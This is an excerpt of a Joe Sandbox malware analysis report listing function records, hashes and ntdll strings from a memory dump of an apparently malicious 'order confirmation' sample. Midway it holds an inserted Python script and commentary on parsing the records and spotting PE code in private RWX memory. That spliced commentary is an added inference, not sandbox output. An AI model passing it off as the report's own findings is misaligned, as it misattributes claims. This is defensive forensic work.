                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 629aba4f87020cc04c501b4c1f5e0876edfc5168b70f85239aba709ecbce8861
                                                    • Instruction ID: f3e51471236954a8844cd96be8afc5d239b5dbb3e72e5230e4107833c4f73e97
                                                    • Opcode Fuzzy Hash: 629aba4f87020cc04c501b4c1f5e0876edfc5168b70f85239aba709ecbce8861
                                                    • Instruction Fuzzy Hash: E590023161180542D10175995508646000597F0301F55D022A502459AEC77589D16631
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 28e2c91276b9c188a0739f7d5e0f476b97b442e9f02a50141151f61f50310753
                                                    • Instruction ID: 753c5fd15aa66a9bdb35fe970e931007f48f93b3630c73d705e2de8876551e77
                                                    • Opcode Fuzzy Hash: 28e2c91276b9c188a0739f7d5e0f476b97b442e9f02a50141151f61f50310753
                                                    • Instruction Fuzzy Hash: 3A90023161180543D10171595608707000597E0201F55D422A042459DDD77689916621
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b52a326b3546928e2d6b18e3a03cfa4ac46dafa42f61b4c2787f559b9c20014c
                                                    • Instruction ID: 9fa4e54edd74b412fdf0c5df0fc9c53f4f7a3c332cc74be897372181559e2dde
                                                    • Opcode Fuzzy Hash: b52a326b3546928e2d6b18e3a03cfa4ac46dafa42f61b4c2787f559b9c20014c
                                                    • Instruction Fuzzy Hash: 9E900221A1580542D14171595518706001597E0201F55D022A0024599DC7798B956BA1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ad21fef94bac7f0e79fb4939eb4f24c05dbbbdd16aa91b6548710ab53a1d94a6
                                                    • Instruction ID: fb92b34038529c54098faeb211e5e05ff32b140b6076f0cb61388313516acff6
                                                    • Opcode Fuzzy Hash: ad21fef94bac7f0e79fb4939eb4f24c05dbbbdd16aa91b6548710ab53a1d94a6
                                                    • Instruction Fuzzy Hash: 3890026175180582D10171594514B060005D7F1301F55C026E1064599DC739CD926626
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1103f37c585e65fb2b523d52210dc0ad494f41013091e17d69161c8b0507eca8
                                                    • Instruction ID: affdeab2f724a0c5912e178e8a8c41035c687710df746d5e138ed948ddc4cd77
                                                    • Opcode Fuzzy Hash: 1103f37c585e65fb2b523d52210dc0ad494f41013091e17d69161c8b0507eca8
                                                    • Instruction Fuzzy Hash: D390026162180182D10571594504706004597F1201F55C023A2154599CC6398DA15625
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 828b5acacdfa36c9fbb949f903d4449613c81e7b35289ee2dd40660ede63364b
                                                    • Instruction ID: c2b5fc2d5a20dbc90f76d067d55e38de03c518b919734ca72a028cb1cf4b5cb0
                                                    • Opcode Fuzzy Hash: 828b5acacdfa36c9fbb949f903d4449613c81e7b35289ee2dd40660ede63364b
                                                    • Instruction Fuzzy Hash: E0900221A11801824141716989449064005BBF1211755C132A0998595DC67989A55B65
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2266a76b47d3bf2a2d0d6f194ac9cb033b7ac89f5ed6cc41bb9c29e78cc15f1f
                                                    • Instruction ID: a1091cbeb686316517bc844c5b2e529672ff1e15a1f8768d77cf280f47c138f2
                                                    • Opcode Fuzzy Hash: 2266a76b47d3bf2a2d0d6f194ac9cb033b7ac89f5ed6cc41bb9c29e78cc15f1f
                                                    • Instruction Fuzzy Hash: 66900231611C0542D10171594908747000597E0302F55C022A516459AEC775C9D16A31
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 77d5fdf32d889c85e7123603595057a7bef3e6d3636ca9e9617c98da67963b6d
                                                    • Instruction ID: a7c696121c9ce28c566e8f2a823ff29dd7cadda9083a310d9dc51ad92fc3f755
                                                    • Opcode Fuzzy Hash: 77d5fdf32d889c85e7123603595057a7bef3e6d3636ca9e9617c98da67963b6d
                                                    • Instruction Fuzzy Hash: 2E900231611C0542D1017159491470B000597E0302F55C022A116459ADC73589916A71
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cc1187fdac668db936ee0ec9bca2f1f97f7f15f4d3c2bcbcff0047bf87a88e21
                                                    • Instruction ID: b759bf00f82472ca03463fdc274b13b8128b21af2243890893ae4fbf17d392d6
                                                    • Opcode Fuzzy Hash: cc1187fdac668db936ee0ec9bca2f1f97f7f15f4d3c2bcbcff0047bf87a88e21
                                                    • Instruction Fuzzy Hash: 4B900221621C0182D20175694D14B07000597E0303F55C126A0154599CCA3589A15A21
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9cad8e289d5f6c99701f0e10c218dc21be724928e7637dd8a5f10eeac9c364f0
                                                    • Instruction ID: 90330c20661c63f0ac9b86242fa71860f4210550e732bd6e1a9af00a2efaad45
                                                    • Opcode Fuzzy Hash: 9cad8e289d5f6c99701f0e10c218dc21be724928e7637dd8a5f10eeac9c364f0
                                                    • Instruction Fuzzy Hash: CB90022171180542D103715945146060009D7E1345F95C023E142459ADC7358A93A632
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6baadb38c815acfd41156cf3241b88e2f11f97e86d70f2d39bdd9235a0e3aa97
                                                    • Instruction ID: d60d58dc601e7c5d857c73e2f9e4762801d51b0af1150357633be40b7a96df7b
                                                    • Opcode Fuzzy Hash: 6baadb38c815acfd41156cf3241b88e2f11f97e86d70f2d39bdd9235a0e3aa97
                                                    • Instruction Fuzzy Hash: 0B90027161180542D14171594504746000597E0301F55C022A5064599EC7798ED56B65
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2c532ceadafe775573fa0acf4455da864b0a68356b5ef2935d6e608f65ffe58a
                                                    • Instruction ID: 5bda666a619403412e6fef4579ff928c7c6938de5f9018f84788daef187ef303
                                                    • Opcode Fuzzy Hash: 2c532ceadafe775573fa0acf4455da864b0a68356b5ef2935d6e608f65ffe58a
                                                    • Instruction Fuzzy Hash: 2D900221A1180642D10271594504616000A97E0241F95C033A102459AECB358AD2A631
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 71296ffb3c4f9be620fddc2bad126d3ae3d7cfcd0b2a9e187cac689105b69932
                                                    • Instruction ID: 5402445b3ace3a1da0fe62cd1424fcce05f216c351e1132ed56542df47d6df06
                                                    • Opcode Fuzzy Hash: 71296ffb3c4f9be620fddc2bad126d3ae3d7cfcd0b2a9e187cac689105b69932
                                                    • Instruction Fuzzy Hash: 59900261611C0543D14175594904607000597E0302F55C022A206459AECB398D916635
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eb2c0aefab2774f8efb7948ad7096eaa7d3f4c0676fe3d5245457c29fa918cd6
                                                    • Instruction ID: 89e2eaa11390b30660717246aa9444964a4284c5bc96abf6ee458975ea2d2151
                                                    • Opcode Fuzzy Hash: eb2c0aefab2774f8efb7948ad7096eaa7d3f4c0676fe3d5245457c29fa918cd6
                                                    • Instruction Fuzzy Hash: 17900221611C4582D14172594904B0F410597F1202F95C02AA4156599CCA3589955B21
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 33521097ac396ee985c714fe3da55397a4b27f815dd371e7881f5c75bb71f5e7
                                                    • Instruction ID: 58bb3377fcd5e9d9ace7bfc92bf1e2f4d22637031f6f1550a5077231ddd654d5
                                                    • Opcode Fuzzy Hash: 33521097ac396ee985c714fe3da55397a4b27f815dd371e7881f5c75bb71f5e7
                                                    • Instruction Fuzzy Hash: C490022165180942D141715985147070006D7E0601F55C022A0024599DC7368AA56BB1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7afd2569c607fa7087656b0dee9c7b7fa4e82ac553f87ca788d43d4621ed106a
                                                    • Instruction ID: 04190991d24e56e217bd33ca31ecfc8ac14408b18a35db71920830b364cde46e
                                                    • Opcode Fuzzy Hash: 7afd2569c607fa7087656b0dee9c7b7fa4e82ac553f87ca788d43d4621ed106a
                                                    • Instruction Fuzzy Hash: FF90022165585242D151715D45046164005B7F0201F55C032A08145D9DC67589956721
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 079800e406bf3852353c7496a7d5395e7ca6d454c50807a16a0df7f8eb131d23
                                                    • Instruction ID: c0b61582e1b32f655ed733ececc800e056ca20837d3d7696f6b57bfb1b20af7e
                                                    • Opcode Fuzzy Hash: 079800e406bf3852353c7496a7d5395e7ca6d454c50807a16a0df7f8eb131d23
                                                    • Instruction Fuzzy Hash: F290023161280282954172595904A4E410597F1302B95D426A0015599CCA3489A15721
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9362f415fb383a38b28dd5fcc239714f39f6cbec9d7e0ec492675f4129432e4
                                                    • Instruction ID: e3c0f023725922a206ae8b394d79783418174d1d430981880d8a1b3d5c88a48b
                                                    • Opcode Fuzzy Hash: f9362f415fb383a38b28dd5fcc239714f39f6cbec9d7e0ec492675f4129432e4
                                                    • Instruction Fuzzy Hash: F990023561180542D51171595904646004697E0301F55D422A042459DDC77489E1A621
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction ID: faa3bc59d46e19ae98341e378f68584edea85760f0a4875d322f4af6ff072fb0
                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction Fuzzy Hash:
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 1244f56d97af716811ddd555e34c987ca927a22b16d8ce629dd22015651e8d28
                                                    • Instruction ID: a266b93fb5b0c99f81f6d290c39fc841dc06b73669f5991b5f6ee6d91bda4f52
                                                    • Opcode Fuzzy Hash: 1244f56d97af716811ddd555e34c987ca927a22b16d8ce629dd22015651e8d28
                                                    • Instruction Fuzzy Hash: 8651E6B6A00256BFCB11DFAD889097FFBB8BB08244B54826EF565D7A41D334DE5087E0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 05e39ef9031ce2fec27fb0bf44520a13806ded3187d72957e25f11329f7f395a
                                                    • Instruction ID: f8efc385ed3ec2e773829c9eb5b5935babcb0e74d25c0de1713a568a52301c8e
                                                    • Opcode Fuzzy Hash: 05e39ef9031ce2fec27fb0bf44520a13806ded3187d72957e25f11329f7f395a
                                                    • Instruction Fuzzy Hash: 25510371A00646BACB30DF9DC990D7FBBBCEB44208B40842BE4D6D7791E6B4DA408761
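The records above are the raw per-function output of the Joe Sandbox IDA plugin, one block per function, with the dump it came from, the APIs and strings it references, and an API String ID that is the key behind the "Similarity" heading. The following is an added example, not part of the Joe Sandbox report or its tooling: it parses records in this layout, decodes the numeric .sdmp dump file name, and clusters functions that share an API String ID, as the two ___swprintf_l records above do. It assumes the .sdmp name is laid out as process.dump.identifier.base.protect.state.type.reserved; the snapshot name on this page (hcaresult_4_2_1380000_...) supports the process, dump and base fields, and protect/state/type are decoded with the winnt.h constants (0x40 PAGE_EXECUTE_READWRITE, 0x1000 MEM_COMMIT, 0x20000 MEM_PRIVATE). The sample text is constructed from three records on this page.

```python
"""Parse Joe Sandbox execution-graph function records, decode the .sdmp dump
name and cluster functions by API String ID. Added example, not Joe Sandbox code."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# winnt.h memory constants. ASSUMPTION: .sdmp name fields are
# process.dump.id.base.protect.state.type.reserved (the report's own snapshot
# name hcaresult_4_2_1380000_... confirms process, dump and base).
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
KV_RE = re.compile(r"^• ([^:]+?):\s?(.*)$")
SOURCE_RE = re.compile(r"^(\S+\.sdmp), Offset: [0-9A-Fa-f]+, based on PE: (true|false)$")

# Constructed sample in the report's own layout: two ___swprintf_l functions
# sharing an API String ID, then a stub with no API or string references.
SAMPLE = """\
Memory Dump Source
• Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
• Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Instruction ID: a266b93fb5b0c99f81f6d290c39fc841dc06b73669f5991b5f6ee6d91bda4f52
Memory Dump Source
• Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Instruction ID: f8efc385ed3ec2e773829c9eb5b5935babcb0e74d25c0de1713a568a52301c8e
Memory Dump Source
• Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Instruction ID: ae56a6fc7267ee771b6fd9efa93172b67a0dd7ace343ebfed6081d6e1a7f7561
"""


@dataclass
class FunctionRecord:
    source_file: str = ""
    based_on_pe: bool = False
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    api_string_id: str = ""
    instruction_id: str = ""


def parse_records(text):
    """One FunctionRecord per 'Memory Dump Source' block; xref lines and keys not modelled here are skipped."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = FunctionRecord()
            records.append(cur)
            continue
        m = KV_RE.match(line)
        if cur is None or not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "Source File":
            s = SOURCE_RE.match(value)
            cur.source_file, cur.based_on_pe = s.group(1), s.group(2) == "true"
        elif key == "API ID":
            cur.apis = [a for a in value.split("$") if a]
        elif key == "String ID":
            cur.strings = [x for x in value.split("$") if x]  # '$' separates the strings
        elif key == "API String ID":
            cur.api_string_id = value
        elif key == "Instruction ID":
            cur.instruction_id = value
    return records


def decode_dump_name(name):
    """Turn the numeric .sdmp name into process, dump, base and VirtualQuery-style flags."""
    proc, dump, _ident, base, protect, state, mtype = name.split(".")[:7]
    p, s, t = int(protect, 16), int(state, 16), int(mtype, 16)
    return {"process": int(proc), "dump": int(dump), "base": int(base, 16),
            "protect": PAGE_PROTECT.get(p, hex(p)), "state": MEM_STATE.get(s, hex(s)),
            "type": MEM_TYPE.get(t, hex(t))}


def similar_groups(records):
    """Functions sharing an API String ID; stubs with neither APIs nor strings are left out."""
    groups = defaultdict(list)
    for r in records:
        if r.apis or r.strings:
            groups[r.api_string_id].append(r.instruction_id)
    return {k: v for k, v in groups.items() if len(v) > 1}


def pe_in_private_rwx(records):
    """(process, base) of dumps parsed as a PE yet sitting in committed private RWX
    memory rather than a MEM_IMAGE mapping: the shape injected or manually mapped code takes."""
    hits = set()
    for r in records:
        d = decode_dump_name(r.source_file)
        if (r.based_on_pe and d["protect"] == "PAGE_EXECUTE_READWRITE"
                and d["state"] == "MEM_COMMIT" and d["type"] == "MEM_PRIVATE"):
            hits.add((d["process"], d["base"]))
    return sorted(hits)
```

Run against this page's records, the decoder reports one region in process 4 at 0x01380000 that Joe Sandbox parsed as a PE but that is committed private RWX memory rather than an image mapping, and the functions inside it carry ntdll's own diagnostic strings (CLIENT(ntdll): ..., RTL: ...). That is the region to dump and compare against the on-disk ntdll when following up the report's direct/indirect syscall and process injection signatures; whether it is a privately mapped copy of ntdll is an inference from those observations, not something the report itself states.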
                                                    Strings
                                                    • Execute=1, xrefs: 01424713
                                                    • ExecuteOptions, xrefs: 014246A0
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014246FC
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01424742
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01424655
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01424725
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01424787
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    • Opcode ID: f5720daf4d80a7e41b5c1d3c7c388ea0e12336b8aa7608e19e6113d068406302
                                                    • Instruction ID: 11faaafb5c500d36b2864bd0e7888c6171748580a3c3028787132119c45e0d9f
                                                    • Opcode Fuzzy Hash: f5720daf4d80a7e41b5c1d3c7c388ea0e12336b8aa7608e19e6113d068406302
                                                    • Instruction Fuzzy Hash: 46512D3160032ABAEF21ABA9DC89FFA77E8EF5431CF44009DD605AB1D1D7719A458F90
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-$0$0
                                                    • API String ID: 1302938615-699404926
                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction ID: 9bb8804a780b6066669730f2c663ed6393cb39a9b6b08c9fe89c0bd8fbe894c0
                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction Fuzzy Hash: 6281D2B0E052498EEF258E6CC8517FEFFB6AF85368F18411DDA61A7299C7348840CB61
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$[$]:%u
                                                    • API String ID: 48624451-2819853543
                                                    • Opcode ID: e4a2608e1c4d5db309166c185c0dac4f8c2b2a2bf2d8e286e7055d29c967d518
                                                    • Instruction ID: f5521f767d0f0a8d1699aebff552ee0d934ce1b637e14d4db1f6d31afeb049e0
                                                    • Opcode Fuzzy Hash: e4a2608e1c4d5db309166c185c0dac4f8c2b2a2bf2d8e286e7055d29c967d518
                                                    • Instruction Fuzzy Hash: 4E2133BAE00119ABDB11DF69D840EFF7BECEF54658F44012AEA05E3254E771DA018BA1
                                                    Strings
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014202E7
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014202BD
                                                    • RTL: Re-Waiting, xrefs: 0142031E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    • Opcode ID: 29e83d5a3b1d43d2b23175c35cfb8ee0c85cf13ac9c3b174e13404390dc6151f
                                                    • Instruction ID: 83de9d0a39da752d50b8821818be2ffe1f7f1a867784b3b1dee619b13df22e98
                                                    • Opcode Fuzzy Hash: 29e83d5a3b1d43d2b23175c35cfb8ee0c85cf13ac9c3b174e13404390dc6151f
                                                    • Instruction Fuzzy Hash: 78E1CE316047419FD725CF28D884B2ABBE4BB84328F140A1EF5A6CB7E1D774D986CB52
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 01427B8E
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01427B7F
                                                    • RTL: Re-Waiting, xrefs: 01427BAC
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
                                                    • Opcode ID: 06453a71e0cc922cf444c97b90c55802d08b7bc534851c5eb2f5c55e57faf66c
                                                    • Instruction ID: c1ac3d1430c5b654c7c720bd93a52d2b674140b5de215feed1962bd9980d021c
                                                    • Opcode Fuzzy Hash: 06453a71e0cc922cf444c97b90c55802d08b7bc534851c5eb2f5c55e57faf66c
                                                    • Instruction Fuzzy Hash: 8C4125317007169FDB21CE29C840B27B7E5EF98715F000A1EFA5AD7790DB31E84A8B91
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0142728C
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 014272A3
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01427294
                                                    • RTL: Re-Waiting, xrefs: 014272C1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
                                                    • Opcode ID: 999527f9837cf713b0891e26e501961bb2672c17ed5e57845da7b24f36e06e2c
                                                    • Instruction ID: 7054f2fa225822dde4af37501e61fad5d78da4e837064f67b4bfdc68c9880aaa
                                                    • Opcode Fuzzy Hash: 999527f9837cf713b0891e26e501961bb2672c17ed5e57845da7b24f36e06e2c
